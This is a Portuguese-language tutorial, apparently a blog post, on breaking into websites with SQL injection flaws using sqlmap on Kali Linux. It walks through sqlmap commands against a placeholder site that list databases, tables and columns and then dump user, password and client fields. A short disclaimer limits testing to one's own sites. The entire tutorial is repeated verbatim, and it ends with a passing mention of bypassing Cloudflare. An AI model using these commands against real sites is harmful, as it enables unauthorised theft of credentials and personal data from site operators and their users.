Invasão a sites com falhas SQL com SQLMAP
No tutorial a seguir, irei demonstrar como se faz uma invasão a um site com falha SQL Injection. Para essa invasão ser bem sucedida, o site deve contém esta falha.
[Este tutorial é apenas para fins profissionais e testes educacionais, todos esses testes devem ser feitos em sites dê sua propriedade. Pois realizar este método em site que não é de sua propriedade, caracteriza crime! Não me responsabilizo por mal uso da ferramenta]
1º - Abra o terminal no Kali Linux, e dê o seguinte comando e dê enter:
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 --dbs
2º - Irá aparecer os nomes das databases do banco de dados, escolha uma database e dê o comando: (cmbicas é o nome da tabela fictícia que inventei, mas no seu site, será uma tabela com outro nome!)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas --tables
3º - Irá aparecer os nomes das tabelas dessa database, então, você deverá dar o comando: (phpsp_users é o nome da minha tabela fictícia! No seu caso, será outra coluna, e também, poderá ter muitas tabelas)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas -T phpsp_users --columns
4º - Aparecerá as colunas que possuem nesta tabela, poderá haver várias colunas, como Nome, Login, Senha, Email, CPF, Idade, Localidade, etc... Varia de caso para caso. Dê o comando:
(utilizarei o exemplo fictício dê user, password e cliente)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas -T phpsp_users -C user,password, cliente --dump
Pronto, aparecerá as informações no terminal. Aparecerá as informações das quais você selecionou, no caso, user, password, e cliente. Este é um ataque em sites que possuem falhas SQL Injection. Ataque realizado via SQLMAP, no Kali Linux.
No tutorial a seguir, irei demonstrar como se faz uma invasão a um site com falha SQL Injection. Para essa invasão ser bem sucedida, o site deve contém esta falha.
[Este tutorial é apenas para fins profissionais e testes educacionais, todos esses testes devem ser feitos em sites dê sua propriedade. Pois realizar este método em site que não é de sua propriedade, caracteriza crime! Não me responsabilizo por mal uso da ferramenta]
1º - Abra o terminal no Kali Linux, e dê o seguinte comando e dê enter:
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 --dbs
2º - Irá aparecer os nomes das databases do banco de dados, escolha uma database e dê o comando: (cmbicas é o nome da tabela fictícia que inventei, mas no seu site, será uma tabela com outro nome!)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas --tables
3º - Irá aparecer os nomes das tabelas dessa database, então, você deverá dar o comando: (phpsp_users é o nome da minha tabela fictícia! No seu caso, será outra coluna, e também, poderá ter muitas tabelas)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas -T phpsp_users --columns
4º - Aparecerá as colunas que possuem nesta tabela, poderá haver várias colunas, como Nome, Login, Senha, Email, CPF, Idade, Localidade, etc... Varia de caso para caso. Dê o comando:
(utilizarei o exemplo fictício dê user, password e cliente)
sqlmap -u http://www.sitevulneravel.com.br/test.php?id=2 -D cmbicas -T phpsp_users -C user,password, cliente --dump
Pronto, aparecerá as informações no terminal. Aparecerá as informações das quais você selecionou, no caso, user, password, e cliente. Este é um ataque em sites que possuem falhas SQL Injection. Ataque realizado via SQLMAP, no Kali Linux.
É importante tbm frizar que o uso dessas ferramentas em sites protegidos, por exemplo pelo cloudflare, exigiria o uso de técnicas de bypass, então não vou me ater ao assunto...